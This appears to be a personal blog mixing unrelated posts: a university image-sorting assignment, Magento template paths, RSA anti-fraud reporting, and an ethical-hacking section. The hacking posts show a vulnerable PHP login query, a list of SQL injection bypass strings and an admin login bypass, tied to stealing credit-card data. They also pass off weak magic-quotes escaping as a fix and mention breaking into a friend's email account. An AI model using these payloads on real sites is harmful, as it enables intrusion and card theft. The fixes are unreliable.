I was assigned a special task by my professor to write a code on wonders of the world. The objective of the code was to read a provided set of images and database and replicate a system that would sort the images in specified orders. There were three types of specifications provided

1. Natural

2. Temperature

3. Accessibility

After selection another window opens in which the output is displayed, the output contains a series of images sorted in the selected order.

This “window-2″ has four buttons.

“First”, “Next”, “Previous” and “Last”, each does a task specified by its title and moves images in that order.

If you want the source code for this program, comment on this post.

HTML based tutorial can be found on

http://www.w3schools.com/html/

i went through that URL advised to me by Dr. Ralph Moseley, module leader of Internet Programming at Middlesex University, London.  Since i had some previous hands-on experince with this language i was able to get the perfect score.

W3Schools HTML Quiz

Result:

20 of 20

100%

Perfect!!!

Time Spent
1:53

You guys should try it too. Since we would be dealing with this language more frequently now.

Studying  ethical hacking has given me an upper hand on the hackers.  Hackers are people who learn stuff on their own. But we on the other hand are taught how to use stuff for saftey purposes.

One of our tools are security companies like RSA Anti-Fraud Command Center. Hackers basically inject their script code and upload it on FREE SCRIPT WEBSITES. Most developers are unaware of that fact and to save their time they download such scripts and upload it to their website. These script create automatic login pages that redirect to other websites. These are called Fraud Pages.
These pages should be reported immediately to RSA Anti-Fraud Command Center. What they do is they send an email just like below :

”

Dear Team

It appears that your website ******.com has been hacked by a fraudster. It is now hosting a phishing attack against RBC.
Please remove the fraudulent folders/files as soon as possible and secure your website as it has been compromised.
Please note that it is possible that the fraudulent content is embedded in your website’s legitimate files.

http://www.*****.com/sites/Library_/redirect.php

In addition, please send us any source files of the attack.
Please let us know if you have any questions or need further assistance. We appreciate your cooperation.

Best Regards,

RSA Anti-Fraud Command Center
RSA, The Security Division of EMC
US Phone: +1-866-408-7525
Email: afcc@rsa.com
For more information about RSA’s AFCC
http://www.rsa.com/node.aspx?id=3348

”

to the concerned authority and tell them to remove it. This is a very good way since they allow the developer to correct his mistake and be careful for next time.

You can see the contact information in their email and whenever you come across any such illegal page.

Just report it!

Help us keep web clean and safe for upcoming generation !

Change Logo:
skin/frontend/default/default/images/
01. logo.gif
02. logo_email.gif

Main Templates:
/public_html/app/design/frontend/base/default/template/page

Side boxes:
/public_html/app/design/frontend/base/default/template/callouts

Majento Product Details Page:
/public_html/app/design/frontend/base/default/template/catalog/product/view.phtml

header:
/public_html/app/design/frontend/base/default/template/page/html/header.phtml
/public_html/app/design/frontend/default/f001/template/page/html

Search box:
/public_html/app/design/frontend/base/default/template/catalogsearch

Footer:
/public_html/app/design/frontend/base/default/template/page/html/header.phtml
in static blocks

remove footer links
/public_html/app/design/frontend/base/default/layout/catalog.xml
/public_html/app/design/frontend/base/default/layout/contacts.xml
/public_html/app/design/frontend/base/default/layout/catalogsearch.xml

Featured:
/public_html/app/design/frontend/default/default/template/inchoo

Compare Products:
/public_html/app/design/frontend/base/default/template/catalog/product/compare

Newsletter Box:
/public_html/app/design/frontend/base/default/template/newsletter

Installed Modules:
/public_html/app/design/frontend/default/default/template

Free themes:

http://www.patternhead.com/found-freebies/21-free-magento-themes-for-your-e-commerce-store

MODULES: /public_html/app/design/frontend/default/default/template

Slider : Simple Banners
magento-community/Banners

http://www.magentocommerce.com/magento-connect/Free+Magento+Extensions/extension/3382/banners

{{block type=”banners/banners” name=”banners” template=”banners/banners.phtml”}}

app\design\frontend\default\default\template\banners
app\design\frontend\default\default\layout\banners.xml

Side Blocks:
magento-community/AsiaConnect_FreeCMS

sidebar-right-top
sidebar-right-bottom
sidebar-left-top
sidebar-left-bottom
content-top
menu-top
menu-bottom
page-bottom

Featured:
magento-community/Inchoo_FeaturedProducts

index.php/featured-products/ (store link)

{{block type=”featuredproducts/listing” template=”inchoo/block_featured_products.phtml”}}

NEW Products:
{{block type=”catalog/product_new” name=”home.catalog.product.new” alias=”product_homepage” template=”catalog/product/new.phtml”}}

/public_html/app/design/frontend/default/f001/template/catalog/product
/public_html/app/design/frontend/base/default/template/catalog/product
/public_html/app/code/core/Mage/Catalog/Block/Product/new.php

Best Seller:
magento-community/Luxe_Bestsellers

{{block type=”bestsellers/list” name=”home.bestsellers.list” alias=”product_homepage” template=”catalog/product/list.phtml”}}

Default: {{block type=”bestsellers/list” name=”home.bestsellers.list” alias=”product_homepage” template=”catalog/product/list.phtml””}}
Path: /public_html/app/design/frontend/base/default/template/catalog/product/list.phtml

Popular:
magento-community/Luxe_MostViewed”}}

{{block type=”mostviewed/list” name=”home.mostviewed.list” alias=”product_homepage” template=”catalog/product/list.phtml”}}

Include static block:

{{block type=”cms/block” block_id=”home-page-promo”}}
getLayout()->createBlock(‘cms/block’)->setBlockId(‘footer_links’)->toHtml() ?>

E-Commerce Website Hacking

Since i am a Website Application Developer by profession and my main expertise include E-Commerce based websites specially OSCommerce and Magento based websites.  I thought why not check the vulnerability of such systems.

Before we start i would like to give you a background info about them. These systems are widely used by the web development companies all over the world including mine. Our systems have security fixes/patches which protect hackers from getting inside the system very easily. Because we have been attacked in the past and such vulnerabilities are identified or discovered after experience in these companies which actually causes alot of damage if there is no backup available.

I remember the day when i was working in a Private Web Development company (whose name i would prefer not to mention here), i heard the news that our websites were hacked. Atleast 4-5 E-Commerce websites were hacked that day. Clients showered our management with emails asking them to fix this problem.  Since those websites were developed by another team i was calm and enjoying the situation. There was panic everywhere. 4 developers and Project executive were discussing the security leak and reading client’s email about getting some clue so that this doesn’t happen again. They seemed pretty confused so i thought i should give them a hand. But due to my age and experience they were my seniors and its actually considered “rude”  if a junior developer helps you out.  So what i did was i stepped into their discussion asking them the problem and glanced the client’s email and with one look i identified that it was a SQL Injection.

I told them its a SQL Injection and they were like how do you know ? I said i have done some research on it in University life. At first they didn’t show any interest, i was actually ignored. So i just went back to my seat and continued my work.  They still seemed pretty confused so i went to one of  my seniors and explained him the concept and gave him example of that SQL injection query and fortunately he got it and told the Project Executive. Project Executive was very happy with my approach when he actually understood what happened. Then he asked me, ” Qambar, tell us ways to protect such SQL Injections in future”.

I was like “if you have direct contact with the server admin(which he had) just ask him to edit the php.ini file and turn on the magic_gpc_quotes on”. He wasn’t satisfied with my answer since it was not on GOOGLE.COM. :p

Basically my approach was to add slashes to quotations that are injected by POST and GET methods in the browser queries. Because they are the main techniques of the SQL Injection. It was a nice simple approach to protect all websites at once without moving a muscle.

But GOOGLE.COM gave him another approach, off-course there are several solutions to one problem i.e 2+2 = 4 and 2 x 2 = 4.

Another approach is by adding security in .htaccess

you can simply put the following lines in your.htaccess of ALL WEBSITES. I know if you have 100 websites you will have to do it with 100 websites but since Google says it. you will have to do it. Atleast that was the approach of that team’s Project Executive.

RewriteCond %{QUERY_STRING} [^a-z](declare|char|set|cast|convert|delete|drop|exec|insert|meta|script|select|truncate|update)[^a-z] [NC]
RewriteRule (.*) – [F]

Also you can use the following security patch on your oscommerce website. This will also secure your website.

http://addons.oscommerce.com/info/5752

This is basic protection method to protect your OSCommerce website. And other vulnerabilities still exist that i will  demonstrate in my next post about how i hacked 3 oscommerce based websites and the query used by the hacker to attack 4 websites in the above mentioned story.  Stay in touch.

And yes credit cards are hacked from these E-commerce based websites. Once you are in you can get all client related details including passwords, email addresses, credit card information and much more.

Credit Cards Hacking

SQL Injection is a process of adding extra SQL code into the pre-defined SQL query by the coder.

For example, below is a PHP code which is executing an SQL query taking parameters from PHP Script.

$username = $_REQUEST ['username']; //get name
$pass = $_REQUEST['pass']; // get pass

$sql = ‘SELECT id FROM login WHERE username = “‘.$name.’” AND password = “‘.$pass.’”‘;  //query
mysql_query ($sql); //execute

The intended input was user’s username and user’s pass. But a hacker can add EXTRA code  to return the wanted id from the above query.

Question is HOW ?

By adding one of the following (depending upon the scenario) to the respective field.

‘ or ’1′=’1
‘ or ‘x’=’x
‘ or 0=0 –

” or 0=0 –

or 0=0 –

‘ or 0=0 #

” or 0=0 #

or 0=0 #

‘ or ‘x’=’x

” or “x”=”x

‘) or (‘x’=’x

‘ or 1=1–

” or 1=1–

or 1=1–

‘ or a=a–

” or “a”=”a

‘) or (‘a’=’a

“) or (“a”=”a

hi” or “a”=”a

hi” or 1=1 –

hi’ or 1=1 –
‘or’1=1′

there are many more but these are the best ones that i know of

Where ?

Lets take an example of the code we used at the start of the post. By analyzing the code we know that there are two fields on the GUI of the user login form.

Username:
Password:

In this scenario, we can input something like this

username:Admin’ –
password: JUNK

After clicking submit the query in the code takes input in username = Admin’ — and password = JUNK

hence the query becomes

OMG!!!

SELECT id FROM login WHERE username = ‘Admin’ — AND password = “‘.$pass.’”‘;  //query

Last part gets commented because of — which is an SQL comment and it selects the admin id and gives admin access to the respective website.

With passage of time i shall demonstrate it with LIVE examples and videos for your learning. This was just a basic to give you a CONCEPT.

P.S.: Since i am a penetration tester i will tell you methods to protect yourself against these attack in the end of each topic. For now if you are using latest of all the technologies on your web server then consider yourself a bit safe.

Welcome to QambarRaza.com. A platform for Ethical Hacking. I shall not only follow the course methods and display my results in the form of videos and blog post but also share my own personal hacking experience. I have been doing ethical hacking since many years. But it was just for penetration testing and i always reported back the issues to the party i was involved with.

Either it be a friend’s hotmail id or someone’s website for stuff ethical hacking has been my secret passion. I have also hacked into flash games to get high scores. Webserver hacking is the easiest thing do to but hardest thing is to keep that webserver in your control. You can always count on cracking into a websever using tools that i shall use later in these modules. But thats something i gained from my own personal experience and knowledge.

My own webserver was hacked by 6 chinese hackers last week which motivated me to join this course and learn more tricks. I studied their hacking attempt very carefully and saw they planted several scripts onto my webserver. I had to dismantle the scripts to secure my other 9 websites. I have their email addresses their basic details and i know alot more about them now. I let them get away with it because they taught me some new methods from their codes.

I used those methods to protect my other websites and now most of my websites are “secure”. Well thats a hacking joke “my websites are secure”. Nothing is secure on the internet. And you cannot protect anything that is accessible by the user. But you can make it harder for them to get it. Thats what we call SECURITY.

Assume a building with 2 security guards. Theif can still enter into that building but he has to beat those security guards first. So if you already know how powerful is your theif you can increase the number of security guards and to test that power we do Ethical Hacking also known as Penetration Testing.

Anyway, its a good idea to work in a group rather than alone. So if any of you readers are interested in joining me throughout this self-study course you are most welcome.

Please use the comment form below to introduce yourself.